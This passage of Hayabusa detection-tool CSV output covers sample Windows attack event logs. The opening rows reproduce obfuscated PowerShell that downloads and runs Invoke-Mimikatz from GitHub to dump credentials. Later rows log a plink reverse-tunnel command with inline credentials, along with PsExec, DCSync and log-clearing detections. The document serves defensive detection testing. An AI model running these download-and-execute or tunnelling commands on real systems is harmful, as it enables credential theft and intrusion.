([cHaR]111+[cHaR]72+[cHaR]52),[cHaR]39)| IEx",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx 2017-08-31 04:25:20.783 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"(((""{41}{32}{44}{45}{20}{36}{35}{21}{10}{40}{29}{42}{26}{28}{1}{19}{15}{11}{48}{49}{39}{30}{4}{18}{47}{31}{24}{23}{33}{43}{12}{13}{7}{8}{22}{46}{14}{27}{25}{5}{0}{34}{6}{16}{17}{38}{3}{9}{2}{37}"" -f'1','ubuserco','Dump','tz ','festati','atz.ps','); In','s','t','-','p','m/','/','ma','ion/I','co','vok','e-M','on','ntent.','load','t','er','l','p','e-Mimik','.','nvok','gith',':','ti','rS',' (New-','o','{0}','t','String({0}h','Creds','imika','t','s','IEX','//raw','it','Object Net.WebCli','ent).Down','/Exfiltrat','/Powe','m','a')) -F [ChaR]39) | . ( $ShelliD[1]+$sHELliD[13]+'X')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx 2017-08-31 04:25:48.631 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$l7i= "" ))93]RaHc[ f- )'sderCpmuD-'+' ztak'+'imi'+'M'+'-e'+'kovnI'+' '+';)}0{'+'1sp.'+'ztaki'+'mi'+'M-ekovnI/no'+'i'+'ta'+'rtl'+'ifx'+'E/'+'retsa'+'m/'+'tiolpSrewoP'+'/no'+'itats'+'e'+'fitt'+'am'+'/moc'+'.tne'+'tn'+'o'+'cresu'+'buhtig'+'.war//:sptth}0{(gn'+'ir'+'tSdaol'+'n'+'woD.)'+'tne'+'ilCb'+'eW.t'+'eN t'+'c'+'ejbO-w'+'eN('+' X'+'EI'(( ( )'x'+]03[emoHSP$+]12[EmOHsp$ ( & ""; ( cHiLDiTEm (""vAr""+""iaBlE""+"":""+""l7I"")).vaLuE[-1 ..-(( cHiLDiTEm (""vAr""+""iaBlE""+"":""+""l7I"")).vaLuE.lengTh)]-JOIN''|& ( ([StRiNg]$VERbOsePREferENCe)[1,3]+'X'-join'')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx 2017-08-31 04:25:48.647 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,& ( 
$psHOmE[21]+$PSHome[30]+'x') ( (('IE'+'X '+'(Ne'+'w-Obje'+'c'+'t Ne'+'t.We'+'bCli'+'ent'+').Dow'+'n'+'loadSt'+'ri'+'ng({0}https://raw.'+'github'+'userc'+'o'+'nt'+'ent.'+'com/'+'ma'+'ttif'+'e'+'stati'+'on/'+'PowerSploit'+'/m'+'aster'+'/E'+'xfi'+'ltr'+'at'+'i'+'on/Invoke-M'+'im'+'ikatz'+'.ps1'+'{0});'+' '+'Invok'+'e-'+'M'+'imi'+'katz '+'-DumpCreds') -f [cHaR]39)),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx 2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx 2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx 2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx 2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx 2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec 
Execution,,../hayabusa-rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,../hayabusa-rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,../hayabusa-rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx
2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx
2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: helpdesk | Computer: evil.internal.corp | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: EXCHANGE$ | Computer: EXCHANGE | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,info,,Logon Type 3 - Network,User: EXCHANGE$ | Computer: EXCHANGE | IP Addr: 192.168.111.87 | LID: 0x24daa6,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,,Logon Type 5 - Service,User: sshd_server | Computer: PC02 | IP Addr: - | LID: 0xe509,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x21f73 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x45120 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,LatMov,RDP Login from Localhost,,../hayabusa-rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x4a26d | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x73d02,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x7d4f4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: admin01,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,info,,Logon Type 11 - CachedInteractive,User: user01 | Computer: PC01 | IP Addr: 127.0.0.1 | LID: 0x1414c8 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,info,,Logon Type 7 - Unlock,User: user01 | Computer: PC01 | IP Addr: - | LID: 0x1414d9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,../hayabusa-rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,../hayabusa-rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14871d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,../hayabusa-rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,../hayabusa-rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x148f5d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14a321,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: admin01 | Computer: PC01 | IP Addr: 127.0.0.1 | LID: 0x14a321 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: admin01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,LatMov,RDP Login from Localhost,,../hayabusa-rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,low,LatMov,Admin User Remote Logon,,../hayabusa-rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-16 19:01:46.884 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:57182 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:01:50.699 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\plink.exe | PID: 3520 | PGUID: 365ABB72-DD79-5C67-0000-00109C931000,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test | Process: C:\Users\IEUser\Desktop\plink.exe | User: PC01\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x26656 | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfil | C2,Exfiltration and Tunneling Tools Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,C2 | LatMov,Suspicious Plink Remote Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:22.965 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49185 (PC01.example.corp) | Dst: 10.0.2.18:80 (PC02) | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49186 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49186 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,LatMov,Suspicious Outbound RDP Connections,,../hayabusa-rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:03:02.272 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:64763 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:03:02.272 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:61400 (PC01.example.corp) | Dst: 224.0.0.252:5355 () | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:03:47.086 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:59304 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x26656 | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:03:48.078 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\UI0Detect.exe | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3344 | PGUID: 365ABB72-E014-5C67-0000-00104AA11500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.221 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\smss.exe | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
